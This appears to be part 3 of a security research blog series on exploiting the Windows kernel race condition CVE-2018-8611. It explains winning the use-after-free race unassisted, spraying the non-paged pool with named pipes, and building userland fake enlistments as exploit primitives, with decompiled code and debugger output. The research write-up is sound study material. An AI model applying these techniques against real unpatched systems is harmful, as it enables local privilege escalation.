- TL;DR

- Winning the race unassisted

- Pool feng shui

- From use-after-free to ‘primitives’ enlistment

- Conclusion

TL;DR

In the previous post of this series (part 2), we explained the root cause of the CVE-2018-8611 vulnerability and how to trigger a use-after-free, using the WinDbg debugger to win the race.

In this part, we detail how we managed to win this race without a debugger assisting us. We also describe how, in parallel, we investigated controlling the contents of the structure that is used after being freed, which gives us a more useful exploit primitive. Finally, we go over some general debugging tricks that helped us while developing the exploit.

As a reminder, the vulnerability resides in TmRecoverResourceManager(), which contains a while loop that tries to notify all the enlistments. We call the thread stuck in this loop, which is the thread we want to race, the recovery thread (as it is stuck trying to recover the resource manager). By forcing the race window open, we showed that we can free a _KENLISTMENT from another thread and make the recovery thread reuse that _KENLISTMENT at the next iteration of the loop.

Winning the race unassisted

Suspending the recovery thread

Originally, we tried many approaches to winning the race condition by congesting the resource manager mutex using NtQueryInformationResourceManager(), as described in part 2, but we never once won the race. We tried things like repeatedly changing the resource manager name using memory that was guaranteed to generate page faults, to slow it down (j00ru’s Bochspwn technique), but in practice it didn’t help.

Eventually we re-read the Kaspersky write-up, and more precisely the following:

But the vulnerability itself is triggered in the third thread. This thread uses a trick of execution NtQueryInformationThread to obtain information on the latest executed syscall for the second thread. Successful execution of NtRecoverResourceManager will mean that race condition has occurred and further execution of WriteFile on previously created named pipe will lead to memory corruption.

At this point, the use of NtQueryInformationThread() had not made any sense to us, as we didn’t see how it related to the vulnerability, so we decided to reverse engineer it. Specifically, we looked into the code related to querying the last syscall, and this gave us a big hint.

Let’s look at the NtQueryInformationThread() code for the ThreadLastSystemCall case:

```c
else {
    // case: ThreadLastSystemCall
    // 8u == THREAD_GET_CONTEXT access right
    result = ObReferenceObjectByHandle(ThreadHandle, 8u, PsThreadType, AccessMode, &pEthread, 0i64);
    if ( result >= 0 ) {
        result = PspQueryLastCallThread(pEthread, ThreadInformation, ThreadInformationLength, ReturnLength);
        ObfDereferenceObject(pEthread);
    }
    //...
}
```

The PspQueryLastCallThread function is approximately as follows:

```c
__int64 PspQueryLastCallThread(_ETHREAD *pEthread, PVOID ThreadInformation, ulong ThreadInformationLength, _DWORD *ReturnLength)
{
    //...
    // fails unless the thread is suspended and entered the kernel from user mode
    if ( pEthread->Tcb.State != Suspended || pEthread->Tcb.PreviousMode != UserMode )
        return STATUS_UNSUCCESSFUL;

    FirstArgument = pEthread->Tcb.FirstArgument;
    SystemCallNumber = pEthread->Tcb.SystemCallNumber;
    //...
    if ( ContextSwitches != pEthread->Tcb.WaitBlock[0].SpareLong )
        return STATUS_UNSUCCESSFUL;

    *ThreadInformation = FirstArgument;
    *(ThreadInformation + 4) = SystemCallNumber;
    if ( ReturnLength )
        *ReturnLength = 16;
    return 0i64;
}
```

It turns out that if a thread is not suspended, it’s not possible to query its last syscall. Once our recovery thread is actually suspended, however, we can query it. This made us think about what this meant for winning a race, and after some testing and reversing we realized that when we suspend a thread on Windows, it gets suspended at naturally blocking points inside the kernel, such as while waiting on a mutex.

If we can constantly have one thread requesting that the recovery thread be suspended using SuspendThread(), we can use NtQueryInformationThread() to confirm when suspension has actually completed. At this point there is a chance, but not a guarantee, that the recovery thread has been suspended while attempting to lock the resource manager mutex. It will be more likely to happen if we congest the resource manager mutex from another thread using NtQueryInformationResourceManager(). We refer to this last thread as the "congestion thread".

The TmRecoverResourceManager() code excerpt below is similar to what we showed during our patch analysis in part 2, but now we show the exact place where we want our recovery thread to be suspended:

```c
if ( ADJ(pEnlistment_shifted)->Flags & KENLISTMENT_FINALIZED ) {
    bEnlistmentIsFinalized = 1;
}

// START: Race starts here, if bEnlistmentIsFinalized was not set
ObfDereferenceObject(ADJ(pEnlistment_shifted));

// We ideally want the recovery thread to be suspended here
KeWaitForSingleObject( pResMgr->Mutex, Executive, 0, 0, 0i64);

if ( pResMgr->State != KResourceManagerOnline )
    goto LABEL_35;
} // end of the enclosing if ( bSendNotification ) block

//...

// END: If, while the recovery thread is blocked on KeWaitForSingleObject() above,
// another thread finalized and closed pEnlistment_shifted, it might now
// be freed, but `bEnlistmentIsFinalized` is not set, so the code doesn't know.
if ( bEnlistmentIsFinalized ) {
    pEnlistment_shifted = EnlistmentHead_addr->Flink;
    bEnlistmentIsFinalized = 0;
}
else {
    // ADJ(pEnlistment_shifted)->NextSameRm.Flink could reference freed
    // memory
    pEnlistment_shifted = ADJ(pEnlistment_shifted)->NextSameRm.Flink;
}
```

If the recovery thread was successfully suspended while attempting to lock the resource manager mutex, then we have all the time in the world to free the use-after-free enlistment and replace that memory with fully controlled contents. After that, we resume the recovery thread and hope to trigger the use-after-free. If the use-after-free wasn’t triggered, it means the recovery thread was suspended at a different place and we need to try again.

This approach turned out to be correct and eventually led to our first time triggering the vulnerability without the assistance of the debugger, which was a long time coming.

Identifying which _KENLISTMENT to free

Understanding how to free a _KENLISTMENT leads us to the next important question. How do we work out which _KENLISTMENT to actually try to free?

Each time we suspend the recovery thread and want to attempt a race, the naive approach would be to free all the _KENLISTMENT objects associated with the resource manager being recovered. However, that would not be very efficient, for a couple of reasons:

- That would mean we can only attempt the race once each time we recover the resource manager.

- It would create lots of noise on the kernel pool.

The ideal scenario would be to try to win the race thousands of times, freeing only a single _KENLISTMENT per attempt: the one we think is the candidate for the use-after-free.

It turns out there is a simple trick we can use here, because the entire purpose of the TmRecoverResourceManager() loop we are abusing is to notify enlistments about a state change. As we saw in part 1, each notification contains the GUID of the enlistment being notified, which we can use to identify the enlistment we want to free. We tried this method initially and it worked. Moreover, because the TmRecoverResourceManager() loop sets the current enlistment pointer back to the head of the linked list when one enlistment is freed and we don’t win the race, we intuitively thought we could reuse earlier enlistments in the linked list to get more chances of winning the race. Unfortunately, this doesn’t work: the TmRecoverResourceManager() loop clears the KENLISTMENT_IS_NOTIFIABLE flag so that an already notified enlistment is not notified again, which renders the earlier enlistments useless for winning the race.

A faster solution than using the enlistment’s GUID is to count the number of notifications we have received so far and use that count as an index into an array of the enlistments associated with the recovering resource manager, which gives us the most recently touched enlistment. By design, this tells us the very last enlistment hit by the TmRecoverResourceManager() loop, which means that this _KENLISTMENT is the only possible candidate for the use-after-free at that exact moment. Each time we drain the notification queue, multiple enlistments will most likely have been touched, so we simply ignore all of them except the very last one.

We use a simple helper function for counting notifications in one thread while the recovery thread is running, similar to the following:

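```c
#include <windows.h>
#include <ktmw32.h>   // GetNotificationResourceManager(), link with ktmw32.lib
#include <stdlib.h>   // exit()

// Drain the resource manager's notification queue and return how many
// notifications arrived before a 10 ms timeout.
unsigned int
count_notifications(HANDLE ResourceManagerHandle)
{
    BOOL bRet;
    DWORD dwMilliseconds;
    ULONG ReturnLength;
    TRANSACTION_NOTIFICATION_ALL notification;
    unsigned int ncount = 0;

    ReturnLength = 0;
    dwMilliseconds = 10;

    while (1) {
        bRet = GetNotificationResourceManager(
            ResourceManagerHandle,
            (PTRANSACTION_NOTIFICATION) &notification,
            sizeof(notification),
            dwMilliseconds,
            &ReturnLength
        );
        if (!bRet) {
            // The queue stayed empty for dwMilliseconds: report the count
            if (GetLastError() == WAIT_TIMEOUT) {
                return ncount;
            }
            // Any other failure is unexpected
            exit(1);
        }
        ncount++;
    }

    return ncount;
}
```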

When we have identified the latest enlistment touched by the recovery thread, we simply commit that enlistment and close its handle to free it. How this works was explained in part 2 of this blog series. Finally we need to replace the hole in memory with some new data that we control, which requires us to manipulate the pool.

Pool feng shui

Manipulating the non-paged pool

In parallel with triggering an unassisted race, we started working on obtaining a deterministic pool layout, to maximize the likelihood of a replacement chunk taking the place of the _KENLISTMENT that was unexpectedly (from TmRecoverResourceManager()’s perspective) freed.

In general, when analyzing the state of the kernel pool on Windows, WinDbg’s !poolused, !poolfind, and !pool commands are the most useful.

As we see below, _KENLISTMENT structures are allocated on the non-paged pool, so that is what we will focus on:

```
0: kd> !pool fffffa80`04189be0
Pool page fffffa8004189be0 region is Nonpaged pool
// ...
 fffffa8004189af0 size: 80 previous size: 50 (Allocated) Even (Protected)
 fffffa8004189b70 size: 10 previous size: 80 (Free) ClMl
*fffffa8004189b80 size: 240 previous size: 10 (Allocated) *TmEn (Protected)
        Pooltag TmEn : Tm KENLISTMENT object, Binary : nt!tm
 fffffa8004189dc0 size: 100 previous size: 240 (Allocated) MmCa
 fffffa8004189ec0 size: 140 previous size: 100 (Free ) Io Process: fffffa80059209b0
```

Our approach to non-paged pool feng shui is very standard from a general heap feng shui perspective. In our context, the idea is to make allocations on the non-paged pool as deterministic as possible, in order to control what will be reallocated in place of the freed _KENLISTMENT that we can reuse.

The first thing we want to do in this type of scenario is to create holes the size of _KENLISTMENT structures. We can then fill a hole with the _KENLISTMENT we plan to use after free and be sure that, once it is freed, the free chunk will still sit inside a hole of predictable size. This means no chunk coalescing will occur, and we can reliably replace the same chunk by allocating that same predictable size.

Using enlistments

The first idea we had was to create _KENLISTMENT-sized holes simply by using _KENLISTMENT objects themselves. The very first step is to allocate a bunch of enlistments simply to fill existing holes on the kernel pool. These allocations can stay in place at least until the use-after-free is known to have been triggered.



Next, we created two transactions, A and B, and alternated the allocation of enlistments between them. Ideally, once the existing holes are filled, this means each _KENLISTMENT associated with transaction A is adjacent in memory to a _KENLISTMENT associated with transaction B.

The memory layout would look like this after allocating the enlistments associated with transactions A and B:



Then, when freeing enlistments associated with transaction B, the layout is updated to:

However, in practice this approach did not work. When an enlistment is created and TmpInitializeEnlistment() initializes its fields, additional allocations occur, and these interfere with the layout we want. For example:

```c
if ( TmpIsNotificationMaskValid(NotificationMask, (CreateOptions & ENLISTMENT_SUPERIOR) != 0) )
{
    pEnlistment->NamespaceLink.Links.Parent = 0i64;
    pEnlistment->NamespaceLink.Expired = 0;
    // Side-effect allocation of 0x38 bytes on the same non-paged pool
    pKTMNotifyPacket = ExAllocatePoolWithTag(NonPagedPool, 0x38u, 'NFmT');
    // ...
}
```

One solution would be to create smaller holes to absorb the allocations for these notification packets, but that would require yet another allocation mechanism anyway. We needed a better method.

Using named pipes

The most commonly used technique for making almost arbitrarily controlled non-paged pool allocations is to write data to named pipes. This was documented by, among others, Alex Ionescu in his Spraying the Big Kids’ Pool post. In that post he targets the big pool (allocations larger than 4 KB) using named pipes, but the same approach also works for smaller allocations. A similar approach using regular pipes was also described by some people exploiting the HackSys Extreme Vulnerable Driver.



We will describe the technique in a bit more detail later, but for now it is enough to know that we can use WriteFile() on a named pipe to allocate chunks of controlled size and ReadFile() to free them at our discretion. So we set up two named pipes and interleave their allocations so that, eventually, chunks from the two pipes are adjacent. Then we free all the chunks associated with one named pipe and are left with _KENLISTMENT-sized holes, as originally intended, without any annoying side-effect allocations along the way.



So the first phase actually looks like the following:



Then we read the named pipe data associated with pipe B, to create _KENLISTMENT-sized holes:

Now that we have these perfectly sized holes, we need to place the _KENLISTMENT structures we may use after free into them. This is simply a matter of creating _KENLISTMENT objects as normal: because of how the pool allocator reuses free chunks of matching size, they end up in these holes.

The following output of the !pool command in WinDbg confirms that we have the layout we want:

```
0: kd> !pool fffffa8003728000
Pool page fffffa8003728000 region is Unknown
*fffffa8003728000 size: 240 previous size: 0 (Allocated) *TmEn (Protected)
        Pooltag TmEn : Tm KENLISTMENT object, Binary : nt!tm
 fffffa8003728240 size: 40 previous size: 240 (Free) ....
 fffffa8003728280 size: 240 previous size: 40 (Allocated) TmEn (Protected)
 fffffa80037284c0 size: 240 previous size: 240 (Allocated) NpFr Process: fffffa800228f060
 fffffa8003728700 size: 240 previous size: 240 (Allocated) TmEn (Protected)
 fffffa8003728940 size: 240 previous size: 240 (Allocated) NpFr Process: fffffa800228f060
 fffffa8003728b80 size: 240 previous size: 240 (Allocated) TmEn (Protected)
 fffffa8003728dc0 size: 240 previous size: 240 (Allocated) NpFr Process: fffffa800228f060
```

It is worth noting that the size of a _KENLISTMENT chunk on the pool won’t directly match the size of the _KENLISTMENT structure, because the structure is a kernel object and is thus wrapped in additional structures. For instance, on most versions of Windows the _KENLISTMENT allocation has both an _OBJECT_HEADER and an _OBJECT_HEADER_QUOTA_INFO.

We dump the raw content of a _KENLISTMENT chunk at fffffa8005ae72c0:

```
0: kd> dq fffffa8005ae72c0
fffffa80`05ae72c0  ee456d54`02240005 00000000`00000000
fffffa80`05ae72d0  00000070`00000000 00000000`00000078
fffffa80`05ae72e0  fffffa80`04deb480 00000000`00000000
fffffa80`05ae72f0  00000000`00000004 00000000`00000001
fffffa80`05ae7300  00000000`00000000 00000000`00080020
fffffa80`05ae7310  fffffa80`04deb480 fffff8a0`012627ef
fffffa80`05ae7320  00000000`b00b0003 fffffa80`05ac1cd8
fffffa80`05ae7330  fffffa80`07ceb068 fffffa80`07cebe28
```

Using the trick we learned in part 1, we spot the 0xb00b0003 value. It matches the cookie constant of a _KENLISTMENT, so we expect it to line up with the beginning of the _KENLISTMENT structure.

As expected, the chunk starts with a _POOL_HEADER of 0x10 bytes:

```
0: kd> dt _POOL_HEADER fffffa8005ae72c0
nt_fffff80002a5d000!_POOL_HEADER
   +0x000 PreviousSize : 0y00000101 (0x5)
   +0x000 PoolIndex : 0y00000000 (0)
   +0x000 BlockSize : 0y00100100 (0x24)
   +0x000 PoolType : 0y00000010 (0x2)
   +0x000 Ulong1 : 0x2240005
   +0x004 PoolTag : 0xee456d54
   +0x008 ProcessBilled : (null)
   +0x008 AllocatorBackTraceIndex : 0
   +0x00a PoolTagHash : 0
```

This appears to be a valid _POOL_HEADER. Note that the PoolTag field is 0xEE456D54 rather than 0x6E456D54 ("TmEn" read as a little-endian DWORD): prior to Windows 8, the most significant bit of the tag is set for kernel object allocations (which !pool reports as "(Protected)"), and 0xEE == 0x6E | 0x80.

Next, the chunk has an _OBJECT_HEADER_QUOTA_INFO of 0x20 bytes.

```
0: kd> dt _OBJECT_HEADER_QUOTA_INFO fffffa80`05ae72d0
nt_fffff80002a5d000!_OBJECT_HEADER_QUOTA_INFO
   +0x000 PagedPoolCharge : 0
   +0x004 NonPagedPoolCharge : 0x70
   +0x008 SecurityDescriptorCharge : 0x78
   +0x010 SecurityDescriptorQuotaBlock : 0xfffffa80`04deb480 Void
   +0x018 Reserved : 0
```

The values appear valid. Since the object is on the non-paged pool, it has no PagedPoolCharge value, but it does have an associated NonPagedPoolCharge, and the SecurityDescriptorQuotaBlock pointer seems legitimate.

Then we have the _OBJECT_HEADER of 0x30 bytes:

```
0: kd> dt _OBJECT_HEADER fffffa80`05ae72f0
nt_fffff80002a5d000!_OBJECT_HEADER
   +0x000 PointerCount : 0n4
   +0x008 HandleCount : 0n1
   +0x008 NextToFree : 0x00000000`00000001 Void
   +0x010 Lock : _EX_PUSH_LOCK
   +0x018 TypeIndex : 0x20 ' '
   +0x019 TraceFlags : 0 ''
   +0x01a InfoMask : 0x8 ''
   +0x01b Flags : 0 ''
   +0x020 ObjectCreateInfo : 0xfffffa80`04deb480 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0xfffffa80`04deb480 Void
   +0x028 SecurityDescriptor : 0xfffff8a0`012627ef Void
   +0x030 Body : _QUAD
```

PointerCount, HandleCount and the pointers appear valid for the header above. Finally, we have the actual _KENLISTMENT structure.

```
0: kd> dt _KENLISTMENT fffffa80`05ae7320
nt_fffff80002a5d000!_KENLISTMENT
   +0x000 cookie : 0xb00b0003
   +0x008 NamespaceLink : _KTMOBJECT_NAMESPACE_LINK
   +0x030 EnlistmentId : _GUID {a235adaa-55c8-11e9-9987-000c29a7b191}
   +0x040 Mutex : _KMUTANT
   +0x078 NextSameTx : _LIST_ENTRY [ 0xfffffa80`05b1b778 - 0xfffffa80`05ac1d48 ]
   +0x088 NextSameRm : _LIST_ENTRY [ 0xfffffa80`05ac1d58 - 0xfffffa80`05b1b788 ]
   +0x098 ResourceManager : 0xfffffa80`05ae7db0 _KRESOURCEMANAGER
   +0x0a0 Transaction : 0xfffffa80`05b209f0 _KTRANSACTION
   +0x0a8 State : 105 ( KEnlistmentCommittedNotify )
   +0x0ac Flags : 8
   +0x0b0 NotificationMask : 0x39ffff0f
   +0x0b8 Key : (null)
   +0x0c0 KeyRefCount : 1
   +0x0c8 RecoveryInformation : (null)
   +0x0d0 RecoveryInformationLength : 0
   +0x0d8 DynamicNameInformation : 0xfffffa80`05ae7290 Void
   +0x0e0 DynamicNameInformationLength : 0x44aeb50
   +0x0e8 FinalNotification : 0xfffffa80`04a1ce00 _KTMNOTIFICATION_PACKET
   +0x0f0 SupSubEnlistment : (null)
   +0x0f8 SupSubEnlHandle : 0xffffffff`ffffffff Void
   +0x100 SubordinateTxHandle : 0xffffffff`ffffffff Void
   +0x108 CrmEnlistmentEnId : _GUID {00060a01-0004-0000-806b-0e0980faffff}
   +0x118 CrmEnlistmentTmId : _GUID {044ae870-fa80-ffff-0010-000000000000}
   +0x128 CrmEnlistmentRmId : _GUID {00000000-0000-0000-0070-0a0000000000}
   +0x138 NextHistory : 3
   +0x13c History : [20] _KENLISTMENT_HISTORY
```

As expected the cookie value matches, confirming our alignments are correct.

Now that we have the ability to create and fill holes of the _KENLISTMENT structure size, we need a way to replace the _KENLISTMENT that will be used after free with fully controlled contents.

Object replacement constraints

The allocations made when WriteFile() is called on a named pipe use DATA_ENTRY structures, which are associated with the NpFr pool tag (presumably short for Named Pipe Frame). The associated entry in the pool tag list is:

NpFr - npfs.sys - DATA_ENTRY records (read/write buffers)

To our knowledge, this DATA_ENTRY structure has never been formally documented by Microsoft, and the write-ups on non-paged pool spraying mentioned earlier only discuss it in passing. You can find the ReactOS version of the structure, which they name _NP_DATA_QUEUE_ENTRY, in the drivers/filesystems/npfs/npfs.h file:

```c
typedef struct _NP_DATA_QUEUE_ENTRY
{
    LIST_ENTRY QueueEntry;
    ULONG DataEntryType;
    PIRP Irp;
    ULONG QuotaInEntry;
    PSECURITY_CLIENT_CONTEXT ClientSecurityContext;
    ULONG DataSize;
} NP_DATA_QUEUE_ENTRY, *PNP_DATA_QUEUE_ENTRY;
```

In practice the contents of a named pipe chunk on the non-paged pool are this DATA_ENTRY structure followed by the actual contents written to the named pipe. This data stays on the non-paged pool until the other end of the pipe reads it, at which point the chunk will be freed.

This is shown briefly in WinDbg below (DATA_ENTRY has no symbol so we cannot use the dt command):

```
0: kd> dd fffffa80045e4950-0x10
fffffa80`045e4940  0a240005 7246704e 05aa9a00 fffffa80
fffffa80`045e4950  0e8eb010 fffffa80 0e8f4dd0 fffffa80
fffffa80`045e4960  00000000 00000000 0242ad40 fffff8a0
fffffa80`045e4970  00000000 00000200 00000200 03020100
fffffa80`045e4980  07060504 0b0a0908 0f0e0d0c 13121110
fffffa80`045e4990  17161514 1b1a1918 1f1e1d1c 23222120
fffffa80`045e49a0  27262524 2b2a2928 2f2e2d2c 33323130
fffffa80`045e49b0  37363534 3b3a3938 3f3e3d3c 43424140
```

This shows a 0x10-byte _POOL_HEADER structure, followed by a 0x2c-byte DATA_ENTRY structure, followed by fully controlled incrementing data (00 01 02 03 ...).

When we write data to the named pipe, we need to write enough data that the size of the DATA_ENTRY structure plus the size of the data matches the size of the _KENLISTMENT chunk contents described earlier.



When you calculate the offset of the fake NextSameRm.Flink value you want the kernel to use, make sure the fake _KENLISTMENT starts at the same offset in your named pipe chunk as the real _KENLISTMENT did in its chunk. The difference comes from the prefix structures: the named pipe chunk only has a DATA_ENTRY prefix, whereas the original chunk had both an _OBJECT_HEADER and an _OBJECT_HEADER_QUOTA_INFO.

This is shown in the following diagram:

With the technique we’ve just described, we can replace the _KENLISTMENT with controlled data fairly easily. We confirmed this by triggering the race, forcing the race window open (by patching code as detailed in part 2), and checking that we can change the chunk contents by spraying named pipe writes after the _KENLISTMENT is freed.

Resulting memory layout



When we are actually exploiting the vulnerability by winning the race unassisted, we will only be replacing one _KENLISTMENT hole. When the _KENLISTMENT chunk is freed, we get this layout:



After a named pipe allocated chunk replaces the previously freed _KENLISTMENT chunk:

In future diagrams we won’t show this feng shui, so any time we refer to the use-after-free enlistment, the assumption is that it was placed using this simple feng shui approach.

From use-after-free to ‘primitives’ enlistment

Trapping the recovery thread

In parallel to triggering an unassisted race, we also started investigating how to leverage the use-after-free to get a better exploit primitive. Our end goal is to elevate our privileges, but we first need to build an intermediate arbitrary read/write primitive. And to build such an arbitrary read/write primitive, we first need to get some kind of control.

Our immediate strategy is to use our named pipe kernel allocation primitive to replace the use-after-free _KENLISTMENT with one whose fake NextSameRm.Flink member points to yet another enlistment. However, we don’t know the address of the use-after-free _KENLISTMENT on the non-paged pool, or even where anything is in kernel memory, so we cannot point it back into the kernel.

We do have a solution. Using the named pipe replacement allocation, we can craft the use-after-free _KENLISTMENT with a fake NextSameRm.Flink member that points to another fake _KENLISTMENT, but in userland. This is possible because Windows 10 1809 and earlier (we haven’t checked the recently released 19H1) do not support SMAP.



Once TmRecoverResourceManager() is parsing a fake _KENLISTMENT in userland, it will inevitably reach the code that moves on to the next enlistment managed by the resource manager. However, in our case we just want to trap the loop and have it do nothing until we are ready for it to do something. To do this, we introduce the concept of a trap enlistment. A visual description of a trap enlistment is given in the following figure:

A trap enlistment is a fake _KENLISTMENT in userland whose NextSameRm.Flink simply points to itself, so the kernel TmRecoverResourceManager() loop just spins on a single _KENLISTMENT, effectively acting as a loop NOP. Whenever we want the kernel loop to process a new fake _KENLISTMENT, we simply write its address into our trap enlistment’s NextSameRm.Flink field, and the kernel moves on to the new _KENLISTMENT.

In many cases during exploitation we introduce a list of _KENLISTMENT structures in userland (sometimes over 1000) that when parsed together work as a new exploit primitive. In these scenarios we need to know from userland when the work is complete. In order to do this, we make the tail structure of that list of _KENLISTMENT structures a new trap enlistment, and combine it with a trick that lets us detect a race win from userland. Let’s detail that trick.

Detecting a race win

At the point of successfully exploiting the race condition, we have a fully controlled fake _KENLISTMENT structure on the non-paged pool (thanks to a named pipe write), which points to another fake _KENLISTMENT in userland. Now we face two new problems:

- What can we do now that we’ve won the race?

- How do we detect that we’ve won the race?

Detecting that we have won the race is critical for exploitation. We don’t yet have a kernel information leak, and once we do, we may need to abuse the recovery thread being stuck in the TmRecoverResourceManager() loop in a set of stages. If that’s the case then we need a way to know we won the race to introduce each stage, read leaked pointers, trigger writes, etc. Let’s revisit the TmRecoverResourceManager() loop. We detail each step below this excerpt:

```c
pEnlistment_shifted = EnlistmentHead_addr->Flink;
[5] while ( pEnlistment_shifted != EnlistmentHead_addr )
{
    if ( ADJ(pEnlistment_shifted)->Flags & KENLISTMENT_FINALIZED )
    {
        pEnlistment_shifted = ADJ(pEnlistment_shifted)->NextSameRm.Flink;
    }
    else
[6] {
        ObfReferenceObject(ADJ(pEnlistment_shifted));
        KeWaitForSingleObject( ADJ(pEnlistment_shifted)->Mutex, Executive, 0, 0, 0i64);
        [...]
        if ( (ADJ(pEnlistment_shifted)->Flags & KENLISTMENT_IS_NOTIFIABLE) != 0 )
        {
            [...]
            if ([...]) {
                bSendNotification = 1;
            }
            [...]
[7]         ADJ(pEnlistment_shifted)->Flags &= ~KENLISTMENT_IS_NOTIFIABLE;
        }
        [...]
        KeReleaseMutex( ADJ(pEnlistment_shifted)->Mutex, 0);
        if ( bSendNotification )
        {
            KeReleaseMutex( pResMgr->Mutex, 0);
            ret = TmpSetNotificationResourceManager(
                pResMgr,
                ADJ(pEnlistment_shifted),
                0i64,
                NotificationMask,
                0x20u, // sizeof(TRANSACTION_NOTIFICATION_RECOVERY_ARGUMENT)
                notification_recovery_arg_struct);
[0]         if ( ADJ(pEnlistment_shifted)->Flags & KENLISTMENT_FINALIZED ) {
                bEnlistmentIsFinalized = 1;
            }
            // Race starts here
            ObfDereferenceObject(ADJ(pEnlistment_shifted));
[1]         KeWaitForSingleObject( pResMgr->Mutex, Executive, 0, 0, 0i64);
            // [1] pEnlistment_shifted could now point to a controlled chunk
[2]         if ( pResMgr->State != KResourceManagerOnline )
                goto LABEL_35;
        }
        [...]
[3]     if ( bEnlistmentIsFinalized )
        {
            pEnlistment_shifted = EnlistmentHead_addr->Flink;
            bEnlistmentIsFinalized = 0;
        }
        else
        {
[4][8]      pEnlistment_shifted = ADJ(pEnlistment_shifted)->NextSameRm.Flink;
        }
    }
}
```

Above, let us assume the recovery thread just returned from KeWaitForSingleObject() at [1] and we won the race from another thread. What happens now? The resource manager is tested at [2] to see if it is still online, which it is, so we keep going. Next, one of two branches executes at [3], depending on whether the enlistment (which is now being used after being freed) was originally marked as finalized. In our case it won’t be, as it was tested for KENLISTMENT_FINALIZED at [0] before the enlistment was actually finalized by another thread.

In other words, the enlistment became finalized after the KENLISTMENT_FINALIZED check that sets bEnlistmentIsFinalized had already been made. So in our case we enter the else branch at [4], which follows the trusted linked list of enlistments. Here, it uses a NextSameRm.Flink pointer that we control and have pointed at a fake _KENLISTMENT in userland.

It’s worth noting that the bEnlistmentIsFinalized check that exists in the code above is technically trying to avoid exactly the type of problem we are exploiting, it just didn’t do a good enough job.

Now the recovery thread does another iteration of the while loop due to the fact that pEnlistment_shifted is not equal to the head of the linked list at [5]. When reading through the loop, keep in mind that pEnlistment_shifted points to a fully controlled _KENLISTMENT in userland.

Then, if we just wanted to force the loop to spin, we could set the KENLISTMENT_FINALIZED flag in our fake userland _KENLISTMENT to make it spin even faster and avoid it trying to send notifications.

For now though we want to detect whether or not we won the race, so we aren’t interested in just looping. Therefore we won’t set the KENLISTMENT_FINALIZED flag in our fake userland enlistment in order to reach the else condition at [6].



What is especially interesting is that if we set the KENLISTMENT_IS_NOTIFIABLE flag in our fake userland enlistment, the kernel clears it at [7]. This means we can check from userland whether the flag has been cleared, which tells us that the race has been won! This is exactly what we wanted.

The following diagram shows the KENLISTMENT_IS_NOTIFIABLE scenario:

Because we marked the userland _KENLISTMENT as KENLISTMENT_IS_NOTIFIABLE, the recovery thread ends up executing the same code it ran while initially triggering the race condition vulnerability, except that this time we aren’t triggering a use-after-free. The code run by the recovery thread becomes something we want to abuse in other ways. This will be detailed in part 4 of our series.

Using the previously mentioned "trap enlistment" trick, we ensure that the recovery thread effectively does nothing else in the kernel: it keeps hitting the code at [8], which we simply let loop by pointing the trap enlistment’s NextSameRm.Flink back to itself.

For now, the recovery thread is stuck in the TmRecoverResourceManager() loop. We could not make it exit the while loop even if we wanted to, as we do not know the kernel address of EnlistmentHead needed to satisfy the check at [5].

Before moving on it is worth highlighting one part of the Kaspersky blog which says:

Successful execution of NtRecoverResourceManager will mean that race condition has occurred and further execution of WriteFile on previously created named pipe will lead to memory corruption.

Given the approach we just took to detect a race win, and the fact that in practice we sometimes complete execution of NtRecoverResourceManager() without actually winning the race and triggering the use-after-free, we found this description somewhat misleading. However, it’s possible that the original exploit uses a slightly different approach that never completes a run of NtRecoverResourceManager() without winning the race.

‘Primitive’ enlistments



We use KENLISTMENT_IS_NOTIFIABLE not only to detect the initial race win, as noted above, but also to detect when some ‘work’ has been completed by an injected set of enlistments. This works by always pointing a set of work primitive enlistments to a new trap enlistment and then waiting until the KENLISTMENT_IS_NOTIFIABLE flag of that trap is unset.

This concept is illustrated below:

Any time we talk about triggering some primitive, your mental model should be that the loop is initially in a trapped state, a new set of primitive enlistments is added, and that the last enlistment in that set points to a new trap enlistment that we will wait on. In order to simplify our subsequent diagrams we largely abstract those details away, and we expect the reader to remember this.
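The mental model above can be sketched as follows. Everything here is an assumption for illustration: `FAKE_ENLISTMENT`, `queue_primitives()` and `primitives_done()` are hypothetical helpers, and the flag value is a placeholder. The one design point worth noting is ordering: the whole chain, including the new trap, is built before the current trap is redirected, because the recovery thread is spinning on the old trap and may follow its link at any moment.

```c
#include <stddef.h>
#include <stdint.h>

#define KENLISTMENT_IS_NOTIFIABLE 0x80u /* placeholder value (assumption) */

/* Hypothetical simplified fake enlistment. */
typedef struct FAKE_ENLISTMENT {
    struct FAKE_ENLISTMENT *volatile Next;
    volatile uint32_t Flags;
} FAKE_ENLISTMENT;

/* Link prims[0..n-1] in order, terminate the chain with a fresh
 * self-looping trap, and only then splice the chain in behind the
 * trap the recovery thread is currently stuck on. */
static void queue_primitives(FAKE_ENLISTMENT *old_trap,
                             FAKE_ENLISTMENT *prims, size_t n,
                             FAKE_ENLISTMENT *new_trap)
{
    new_trap->Next = new_trap;
    new_trap->Flags = KENLISTMENT_IS_NOTIFIABLE;
    for (size_t i = 0; i < n; i++)
        prims[i].Next = (i + 1 < n) ? &prims[i + 1] : new_trap;
    /* Publish last: from here on the kernel can walk the new chain. */
    old_trap->Next = (n > 0) ? &prims[0] : new_trap;
}

/* The injected work is complete once the new trap has been visited. */
static int primitives_done(const FAKE_ENLISTMENT *new_trap)
{
    return (new_trap->Flags & KENLISTMENT_IS_NOTIFIABLE) == 0;
}
```

The `volatile` qualifiers keep the compiler from reordering these stores; whether an explicit memory barrier is also needed depends on the target architecture.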

‘Debug’ enlistment



There is another small hurdle in getting our debugger to break shortly after winning the race. How do we set a breakpoint in WinDbg that differentiates between a win and a loss, and that fires before userland detects that the KENLISTMENT_IS_NOTIFIABLE flag has been unset? And how do we easily debug a given fake userland _KENLISTMENT that is part of a primitive we want to test?

The answer is to set the KENLISTMENT_SUPERIOR flag on the fake userland _KENLISTMENT you want to debug, and to set a WinDbg breakpoint at the address marked [a] below. The relevant code is:

```c
bSendNotification = 0;

if ( (ADJ(pEnlistment)->Flags & KENLISTMENT_IS_NOTIFIABLE) != 0 ) {
    bEnlistmentSuperior = ADJ(pEnlistment)->Flags & KENLISTMENT_SUPERIOR;

    // Superior enlistment whose transaction is prepared or in doubt
    if ( bEnlistmentSuperior
      && ((state = ADJ(pEnlistment)->Transaction->State, state == KTransactionPrepared)
          || state == KTransactionInDoubt) ) {
        bSendNotification = 1;
/* [a] */ NotificationMask = TRANSACTION_NOTIFY_RECOVER_QUERY;
    }
    // Non-superior enlistment whose transaction is committed, in doubt or prepared
    // (&& binds tighter than ||)
